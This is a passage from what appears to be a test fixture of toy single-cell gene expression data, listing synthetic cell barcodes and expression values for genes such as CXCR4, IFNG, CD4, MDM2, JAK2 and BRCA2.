"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LEP Expression": {
"name": "LEP Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
3.0,
2.58,
2.58,
2.0,
1.0,
1.58,
3.0,
2.81,
2.32,
3.0,
2.81,
2.32,
2.32,
2.81,
1.58,
2.0,
1.58,
2.81,
2.0,
2.81,
2.81,
1.0,
2.58,
1.58,
2.58,
1.58,
2.32,
3.0,
2.0,
1.0,
2.58,
2.81,
2.32,
3.0,
2.0,
2.0,
1.58,
1.58,
2.58,
2.58,
2.58,
2.0,
1.0,
2.0,
3.0,
2.32,
2.0,
2.81,
1.58,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCR4 Cells": {
"name": "CXCR4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCR4 Expression": {
"name": "CXCR4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.32,
2.58,
2.0,
2.58,
2.0,
2.32,
1.58,
3.0,
2.81,
2.0,
2.81,
2.32,
2.58,
2.58,
1.58,
2.81,
1.58,
2.0,
2.81,
2.32,
3.0,
1.58,
2.81,
2.0,
2.81,
2.81,
2.58,
2.32,
2.58,
1.58,
2.0,
2.58,
2.58,
1.58,
2.0,
2.0,
3.0,
2.32,
1.0,
2.0,
1.0,
2.32,
2.81,
1.58,
1.0,
2.32,
2.58,
2.58,
2.58,
2.58,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IFNG Cells": {
"name": "IFNG Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IFNG Expression": {
"name": "IFNG Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
3.0,
1.0,
2.81,
2.0,
1.58,
2.32,
3.0,
1.0,
2.58,
2.0,
1.0,
1.58,
2.58,
2.58,
2.58,
1.0,
2.32,
1.0,
2.32,
1.58,
3.0,
1.0,
1.0,
2.32,
1.0,
2.81,
2.58,
2.81,
2.81,
2.32,
1.58,
2.81,
1.0,
3.0,
3.0,
2.81,
2.81,
1.0,
2.81,
1.0,
2.81,
2.0,
2.81,
2.0,
3.0,
2.58,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CD4 Cells": {
"name": "CD4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CD4 Expression": {
"name": "CD4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.58,
2.0,
2.0,
1.0,
2.32,
2.0,
2.81,
2.32,
2.0,
2.32,
2.81,
3.0,
1.0,
2.32,
1.0,
2.32,
2.0,
2.0,
2.58,
2.32,
2.58,
1.0,
1.58,
2.58,
3.0,
1.0,
2.58,
1.0,
2.0,
2.0,
2.58,
2.58,
2.81,
1.58,
3.0,
3.0,
3.0,
2.32,
1.0,
1.0,
3.0,
3.0,
1.58,
1.58,
2.32,
2.58,
2.58,
2.32,
1.58,
2.0,
1.0,
1.0,
2.81,
2.32,
1.0,
1.58,
2.81,
1.58,
1.0,
3.0,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MDM2 Cells": {
"name": "MDM2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MDM2 Expression": {
"name": "MDM2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
1.58,
1.58,
1.58,
3.0,
1.58,
2.81,
3.0,
2.81,
2.81,
1.0,
3.0,
2.32,
2.58,
2.58,
1.0,
3.0,
2.81,
2.32,
2.32,
1.58,
2.58,
2.58,
3.0,
2.32,
2.0,
2.0,
3.0,
2.32,
2.81,
2.58,
2.58,
3.0,
1.0,
2.32,
2.81,
3.0,
3.0,
3.0,
3.0,
2.58,
1.58,
3.0,
1.0,
3.0,
2.58,
2.0,
2.32,
2.0,
2.81,
2.58,
2.58,
2.58,
2.81,
2.0,
3.0,
2.32,
2.32,
1.0,
2.58,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"JAK2 Cells": {
"name": "JAK2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"JAK2 Expression": {
"name": "JAK2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.58,
2.81,
2.81,
2.0,
2.32,
1.0,
2.0,
3.0,
1.58,
2.58,
2.0,
2.58,
1.0,
2.81,
2.0,
2.81,
2.58,
1.0,
3.0,
2.81,
1.58,
2.58,
3.0,
2.58,
3.0,
2.58,
1.58,
1.58,
1.0,
3.0,
2.0,
2.0,
2.81,
1.58,
2.0,
2.58,
1.0,
3.0,
1.0,
1.58,
3.0,
3.0,
2.58,
2.32,
1.0,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA2 Cells": {
"name": "BRCA2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
